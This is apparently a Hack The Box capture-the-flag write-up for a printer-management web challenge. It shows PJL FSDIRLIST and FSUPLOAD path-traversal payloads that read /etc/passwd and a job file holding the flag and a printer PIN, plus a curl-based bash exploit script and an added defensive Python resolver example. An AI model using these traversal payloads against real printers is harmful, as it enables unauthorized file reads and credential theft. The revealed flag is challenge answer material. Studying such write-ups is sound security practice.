hackthebox
Task: Exploit a web-based printer management interface to read the flag from the server filesystem.

Solution: Use PJL (Printer Job Language) FSUPLOAD command with path traversal (0:/../../../) to escape the virtual filesystem and read /home/default/readyjob containing the flag.
My uncle isn't allowing me to print documents. He's off to vacation and I need a PIN to unlock this printer. All I found is a web server where this printer is managed from.
Target: http://94.237.120.74:48334
- / shows "Wander Dashboard" with "HTB Printer"
- /jobs page with a form to send PJL (Printer Job Language) commands
- @PJL INFO ID

The web application accepts PJL commands and forwards them to a printer emulator. This is a classic printer exploitation scenario where PJL filesystem commands can be abused.
Key PJL commands that worked:
- @PJL INFO ID - Returns "HTB Printer"
- @PJL INFO STATUS - Returns printer status (CODE=10001, DISPLAY="Ready", ONLINE=True)
- @PJL FSDIRLIST NAME="0:/" ENTRY=1 - Lists printer filesystem directories

The @PJL FSUPLOAD command is vulnerable to path traversal. The printer uses a virtual filesystem starting at 0:/, but we can escape it using ../:
@PJL FSUPLOAD NAME="0:/../../../etc/passwd" OFFSET=0 SIZE=5000
This allowed reading arbitrary files from the server filesystem.
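The root cause seen from the server side, as an added example that is not part of the original writeup or the challenge's code: a resolver that strips the volume prefix and joins the rest, next to one that canonicalizes the path and refuses anything outside the volume root. The naive resolver's logic is an assumption about how such an emulator might map 0:/ to disk; all function names and the sandbox layout are hypothetical and constructed for the demonstration.

```python
import os
import re
import tempfile

NAME_RE = re.compile(r'NAME\s*=\s*"([^"]*)"')  # NAME argument of an FS* command


class PathEscape(Exception):
    """NAME resolves outside the volume root."""


def resolve_naive(volume_root, name):
    # Assumed vulnerable behaviour: drop the "0:" prefix and join; ".." survives.
    rel = name.split(":", 1)[1].lstrip("/")
    return os.path.normpath(os.path.join(volume_root, rel))


def resolve_confined(volume_root, name):
    volume, sep, rel = name.partition(":")
    if sep != ":" or volume != "0":
        raise ValueError("unknown volume: %r" % name)
    root = os.path.realpath(volume_root)
    # realpath collapses ".." and follows symlinks before the containment check.
    target = os.path.realpath(os.path.join(root, rel.replace("\\", "/").lstrip("/")))
    if os.path.commonpath([root, target]) != root:
        raise PathEscape(name)
    return target


def handle_fsupload(volume_root, pjl_line, resolver):
    """Return the file bytes for an FSUPLOAD line (OFFSET/SIZE ignored for brevity)."""
    m = NAME_RE.search(pjl_line)
    if not m:
        raise ValueError("no NAME argument")
    with open(resolver(volume_root, m.group(1)), "rb") as fh:
        return fh.read()


def make_sandbox():
    """Constructed layout: <tmp>/a/b/vol0 is volume 0:, <tmp>/home/default is outside it."""
    base = os.path.realpath(tempfile.mkdtemp())
    vol = os.path.join(base, "a", "b", "vol0")
    os.makedirs(os.path.join(vol, "saved"))
    os.makedirs(os.path.join(base, "home", "default"))
    with open(os.path.join(vol, "saved", "job1"), "wb") as fh:
        fh.write(b"inside volume")
    with open(os.path.join(base, "home", "default", "readyjob"), "wb") as fh:
        fh.write(b"outside volume")
    return vol
```

The containment check runs on the resolved path, so a symlink placed inside the volume that points outside it is rejected the same way as a ../ sequence.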
First, list the printer's virtual filesystem:
@PJL FSDIRLIST NAME="0:/" ENTRY=1
Test path traversal by reading /etc/passwd:
@PJL FSUPLOAD NAME="0:/../../../etc/passwd" OFFSET=0 SIZE=5000
Use FSDIRLIST with path traversal to enumerate directories:
@PJL FSDIRLIST NAME="0:/../../../" ENTRY=1
Found directories: etc, conf, home, rw, tmp, csr_misc, printer
@PJL FSDIRLIST NAME="0:/../../../home/" ENTRY=1
@PJL FSDIRLIST NAME="0:/../../../home/default/" ENTRY=1
Found a file called readyjob in /home/default/.
@PJL FSUPLOAD NAME="0:/../../../home/default/readyjob" OFFSET=0 SIZE=1000
The file contained a PJL job with embedded credentials:
@PJL COMMENT FLAG = "HTB{w4lk_4nd_w0nd3r}"
@PJL SET USERNAME="default"
@PJL SET HOLDKEY="8214"
```bash
#!/bin/bash
# Wander - HTB Web Challenge Exploit

TARGET="http://94.237.120.74:48334"

# Function to send PJL command
send_pjl() {
    local cmd="$1"
    curl -s "$TARGET/jobs" \
        --data-urlencode "cmd=$cmd" \
        -X POST
}

# Step 1: Verify printer
echo "[*] Checking printer ID..."
send_pjl '@PJL INFO ID'

# Step 2: List root filesystem via path traversal
echo "[*] Enumerating filesystem..."
send_pjl '@PJL FSDIRLIST NAME="0:/../../../" ENTRY=1'

# Step 3: List home directory
echo "[*] Checking /home/default/..."
send_pjl '@PJL FSDIRLIST NAME="0:/../../../home/default/" ENTRY=1'

# Step 4: Read the flag file
echo "[*] Reading flag..."
send_pjl '@PJL FSUPLOAD NAME="0:/../../../home/default/readyjob" OFFSET=0 SIZE=1000'
```
| Item | Value |
|---|---|
| Flag | HTB{w4lk_4nd_w0nd3r} |
| Printer PIN (HOLDKEY) | 8214 |
| Username | default |
Use this technique when you see:
0:/

| Command | Description |
|---|---|
| @PJL INFO ID | Get printer identification |
| @PJL INFO STATUS | Get printer status |
| @PJL FSDIRLIST NAME="path" ENTRY=1 | List directory contents |
| @PJL FSUPLOAD NAME="path" OFFSET=0 SIZE=n | Read file contents |
| @PJL FSDOWNLOAD | Write file (if enabled) |
| @PJL FSMKDIR | Create directory |
| @PJL FSDELETE | Delete file |